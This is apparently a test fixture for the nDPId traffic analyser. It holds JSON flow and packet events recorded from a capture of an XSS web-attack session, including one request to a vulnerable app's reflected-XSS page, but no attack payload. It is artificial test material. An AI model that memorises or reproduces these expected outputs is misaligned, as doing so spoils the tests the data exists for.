+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1499347355230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347355230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GH1AAD4GrVusEAABwKgKMtvyAFB7gnog+45hk4AQAOU0iwAAAQEICgE6YmMD5DPY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347356478,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347356478,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hsZAAD4GPwqsEAABwKgKMtwAAFAJPOVdAAAAAKACchAvRAAAAgQFtAQCCAoBOmObAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3233,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3AC\/\/WVQCTzlXqAScSDR3wAAAgQFtAQCCAoD5DURATpjmwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1499347356478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hsdAAD4GPxGsEAABwKgKMtwAAFAJPOVev\/1lUYAQAOVw5wAAAQEICgE6Y5sD5DUR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347357727,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347357727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1499347360286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347360286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h\/5AAD4GPdqsEAABwKgKMtwoAFB3hOCwt03TB4AQAOWarwAAAQEICgE6Z1MD5DjI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347361540,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347361540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8izFAAD4GOp+sEAABwKgKMtw2AFCL9eO9AAAAAKACchCpAwAAAgQFtAQCCAoBOmiMAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1499347361540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Db87gPNi\/XjvqAScSBrQAAAAgQFtAQCCAoD5DoCATpojAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1499347361541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347361541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0izJAAD4GOqasEAABwKgKMtw2AFCL9eO+\/O4DzoAQAOUKRwAAAQEICgE6aI0D5DoC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347364056,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364056,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+jlAAD4Gy5asEAABwKgKMtxQAFCMb5E4AAAAAKACchD4fwAAAgQFtAQCCAoBOmsBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3FBchRpEjG+ROaAScSBCOgAAAgQFtAQCCAoD5Dx3ATprAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3300,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1499347364057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347364057,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+jpAAD4Gy52sEAABwKgKMtxQAFCMb5E5XIUaRYAQAOXhQAAAAQEICgE6awID5Dx3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347365320,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347365320,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CZFAAD4GvD+sEAABwKgKMtxeAFCYJmWsAAAAAKACchAXCwAAAgQFtAQCCAoBOmw9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3F6n4QiemCZlraAScSAl0wAAAgQFtAQCCAoD5D2zATpsPQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1499347365321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347365321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CZJAAD4GvEasEAABwKgKMtxeAFCYJmWtp+EIn4AQAOXE2QAAAQEICgE6bD4D5D2z"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347366586,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347366586,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8voxAAD4GB0SsEAABwKgKMtxsAFDi5tP2AAAAAKACchBctQAAAgQFtAQCCAoBOm16AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3GzFvqcC4ubT96AScSCt\/gAAAgQFtAQCCAoD5D7wATptegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1499347366587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347366587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vo1AAD4GB0usEAABwKgKMtxsAFDi5tP3xb6nA4AQAOVNBgAAAQEICgE6bXoD5D7w"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347369077,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347369077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NkNAAD4Gj42sEAABwKgKMtyGAFA0BFmqAAAAAKACchCDWwAAAgQFtAQCCAoBOm\/pAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ib842EVNARZq6AScSDg\/gAAAgQFtAQCCAoD5EFeATpv6QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1499347369078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347369078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NkRAAD4Gj5SsEAABwKgKMtyGAFA0BFmr\/ONhFoAQAOWABgAAAQEICgE6b+kD5EFe"} 